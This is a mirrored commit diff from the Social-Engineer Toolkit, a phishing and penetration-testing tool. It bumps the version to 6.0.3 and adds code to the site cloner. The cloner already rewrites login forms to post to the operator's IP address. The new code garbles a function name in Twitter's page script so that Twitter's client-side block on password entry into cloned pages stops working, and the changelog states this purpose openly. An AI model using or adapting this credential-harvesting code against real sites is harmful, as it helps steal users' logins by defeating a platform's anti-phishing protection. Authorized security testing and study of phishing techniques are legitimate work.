mirror of
https://github.com/trustedsec/social-engineer-toolkit
synced 2025-04-04 06:46:08 +00:00
Updated to remove website restrictions
This commit is contained in:
parent
d46c3266cc
commit
57f86c00e0
3 changed files with 12 additions and 1 deletions
|
@ -1,3 +1,9 @@
|
|||
~~~~~~~~~~~~~~~~
|
||||
version 6.0.3
|
||||
~~~~~~~~~~~~~~~~
|
||||
|
||||
* added a check in for twitter logins - they are doing client-side validation if root isn't twitter.com - added a rename on function variables to get around the password field not being allowed to be entered
|
||||
|
||||
~~~~~~~~~~~~~~~~
|
||||
version 6.0.2
|
||||
~~~~~~~~~~~~~~~~
|
||||
|
|
|
@ -230,7 +230,7 @@ def print_error(message):
|
|||
print bcolors.RED + bcolors.BOLD + "[!] " + bcolors.ENDC + bcolors.RED + str(message) + bcolors.ENDC
|
||||
|
||||
def get_version():
|
||||
define_version = '6.0.2'
|
||||
define_version = '6.0.3'
|
||||
return define_version
|
||||
|
||||
class create_menu:
|
||||
|
|
|
@ -81,6 +81,11 @@ for line in fileopen:
|
|||
line = re.sub('action="*"', 'action="http://%s/post.php"' % (ipaddr), line)
|
||||
|
||||
|
||||
# this is if twitter is in use, we rename a function name to something garbage to remove password phishing restrictions
|
||||
match2 = re.search("swiftActionQueue={buckets:j", line, flags=re.IGNORECASE)
|
||||
if match2:
|
||||
# garble the buckets name, causes password to not be jacked
|
||||
line = line.replace("swiftActionQueue={buckets:j", "swiftActionQueue={3buckets:j")
|
||||
|
||||
filewrite.write(line)
|
||||
|
||||
|
|
Loading…
Add table
Reference in a new issue